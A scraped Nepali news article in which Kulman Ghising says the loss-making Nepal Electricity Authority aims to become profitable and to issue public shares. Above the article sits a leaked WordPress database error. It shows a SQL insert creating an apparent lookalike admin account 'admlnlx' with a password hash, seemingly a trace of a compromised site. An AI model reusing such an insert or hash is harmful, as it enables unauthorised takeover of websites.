WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B8Yrm0lF7kYwKKat2Z.cTPa8/ZAOSD0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 09:55:58', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ९ –
नेपाल विद्युत प्राधिकरणका कार्यकारी निर्देशक कुलमान घिसिङले घाटामा रहेको प्राधिकरणलाई एकाध वर्षमा नाफामा लागे गरी काम सुरु भएको बताएका छन् । उनले प्राधिकरण ऐनानुसार साधारण सेयर जारी गरिने र जनतालाई समेत लगानीका लागि आग्रह गरिने बताए ।
प्राधिकरणले नेपाल टेलिकमले जस्तै साधारण सेयर जारी गर्न सक्ने व्यवस्था भएकाले त्यसको पनि आवश्यक तयारी गरिने भएकाले नाफामा जाने गरी काम गर्न सबै कर्मचारीलाई आग्रह गरे । घिसिङले नेविप्रा, नेपाल राष्ट्रिय कर्मचारी सङ्गठन र राष्ट्रिय कर्मचारी सङ्गठनको एकता सम्मेलनलाई शुक्रबार सम्बोधन गर्दै यस्तो बताएका हुन् ।
तीन वर्ष पहिले रु २९ अर्ब घाटा सरकारले व्यहोरेको प्राधिकरणको घाटा हाल रु ३५ अर्ब पुगेको छ ।